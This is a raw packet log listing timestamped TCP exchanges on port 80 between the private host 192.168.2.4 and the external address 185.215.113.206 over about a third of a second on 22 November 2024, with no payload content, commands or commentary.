Nov 22, 2024 20:35:27.802293062 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.802333117 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.803179026 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.803226948 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.803236961 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.803278923 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.804107904 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.804152966 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.804213047 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.804255009 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.805046082 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.805097103 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.805144072 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.805185080 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.805982113 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.806025028 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.806046009 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.806118011 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.806926012 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.806966066 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.807028055 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.807071924 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.807862997 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.807914972 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.807960033 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.808003902 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.808815002 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.808866978 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.808896065 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.808942080 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.809766054 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.809807062 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.809813976 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.809849977 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.810708046 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.810755968 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.810846090 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.810889959 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.811610937 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.811650038 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.811736107 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.811774015 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.812608004 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.812643051 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.812652111 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.812680006 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.813493967 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.813534021 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.813617945 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.813657045 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.814425945 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.814470053 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.814483881 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.814519882 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.815380096 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.815424919 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.815509081 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.815547943 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.816354036 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.816395998 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.816410065 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.816450119 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.817284107 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.817332983 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.817380905 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.817419052 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.818233013 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.818279028 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.818361044 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.818401098 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.819159985 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.819205999 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.819262028 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.819302082 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.820123911 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.820136070 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.820174932 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.821006060 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.821053982 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.821141958 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.821185112 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.821966887 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.822024107 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.822057009 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.822098017 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.822885036 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.822935104 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.822983027 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.823020935 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.938069105 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.938117027 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.938179970 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.938225031 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.938395977 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.938443899 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.938582897 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.938630104 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.939343929 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.939387083 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.939470053 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.939512968 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.940310001 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.940359116 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.940396070 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.940431118 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.941255093 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.941301107 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.941366911 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.941406965 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.942163944 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.942213058 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.942276001 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.942316055 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.943089962 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.943141937 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.943187952 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.943233967 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.944112062 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.944165945 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.944180965 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.944220066 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.944983959 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.945031881 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.945092916 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.945128918 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.945929050 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.946007967 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.946043015 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.946080923 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.946899891 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.946949959 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.946983099 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.947029114 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.947047949 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.947825909 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.947875023 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.947932005 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.947972059 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.948848963 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.948896885 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.948900938 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.948935986 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.949677944 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.949724913 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.949757099 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.949800014 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.950615883 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.950664043 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.950725079 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.950767994 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.951575041 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.951622009 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.951683998 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.951728106 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.952640057 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.952655077 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.952708006 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.953440905 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.953571081 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.953756094 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.953757048 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.954503059 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.954564095 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.954591990 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.954634905 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.955333948 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.955385923 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.955390930 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.955420971 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.956248999 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.956299067 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.956398010 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.956440926 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.957842112 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.957886934 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.958101988 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.958101988 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.958125114 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.958167076 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.958245039 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.958287954 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.959052086 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.959100962 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.959162951 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.959198952 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.960020065 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.960071087 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.960145950 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.960189104 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.960958958 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.961007118 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.961049080 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.961086988 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.961935997 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.961982012 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.961987972 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.962018013 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.991615057 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.991657972 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.991841078 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.991847038 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.991847038 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.991878033 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.991894007 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.991934061 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.992558002 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.992630959 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.992661953 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.992703915 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.993473053 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.993520975 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.993604898 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.993648052 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.994410038 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.994460106 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.994496107 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.994539022 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.995374918 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.995419979 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.995488882 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.995533943 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.996258020 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.996304035 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.996373892 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.996417999 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.997147083 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.997190952 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.997256041 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.997298956 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.998066902 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.998115063 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.998191118 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.998231888 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.999022007 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.999067068 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.999078989 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.999140024 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.999917984 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.999968052 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:28.000016928 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:28.000056982 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:28.000827074 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:28.000870943 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:28.000943899 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:28.000988007 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:28.001780987 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:28.001828909 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:28.001924038 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:28.001971006 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:28.002751112 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:28.002798080 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:28.002966881 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:28.003010035 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:28.003681898 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:28.003726006 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:28.003726959 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:28.003765106 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:28.004549026 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:28.004592896 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:28.004653931 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:28.004693985 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:28.005595922 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:28.005642891 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:28.005728006 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:28.005774975 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:28.006562948 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:28.006608963 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:28.006649017 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:28.006690979 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:28.007381916 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:28.007422924 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:28.007435083 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:28.007471085 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:28.008249044 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:28.008291006 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:28.008296967 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:28.008332968 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:28.009182930 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:28.009244919 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:28.009287119 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:28.009329081 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:28.010071993 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:28.010118008 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:28.010155916 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:28.010199070 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:28.010984898 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:28.011033058 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:28.011059999 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:28.011106014 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:28.011919022 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:28.011965990 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:28.011991978 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:28.012031078 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:28.012904882 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:28.012947083 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:28.012962103 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:28.013000011 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:28.013808012 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:28.013849974 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:28.013935089 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:28.013976097 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:28.014801025 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:28.014843941 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:28.014846087 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:28.014880896 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:28.130779982 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:28.130837917 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:28.130847931 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:28.130897999 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:28.130964041 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:28.131066084 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:28.131066084 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:28.131856918 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:28.131903887 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:28.131969929 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:28.132011890 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:28.132591009 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:28.132637978 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:28.132658005 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:28.132695913 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:28.133603096 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:28.133646965 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:28.133680105 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:28.133719921 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:28.134485006 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:28.134526968 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:28.134557009 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:28.134593010 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:28.135396957 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:28.135437012 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:28.135493994 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:28.135545015 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:28.136328936 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:28.136370897 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:28.136400938 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:28.136440039 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:28.137187958 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:28.137229919 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:28.137305975 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:28.137346983 CET	49750	80	192.168.2.4	185.215.113.206
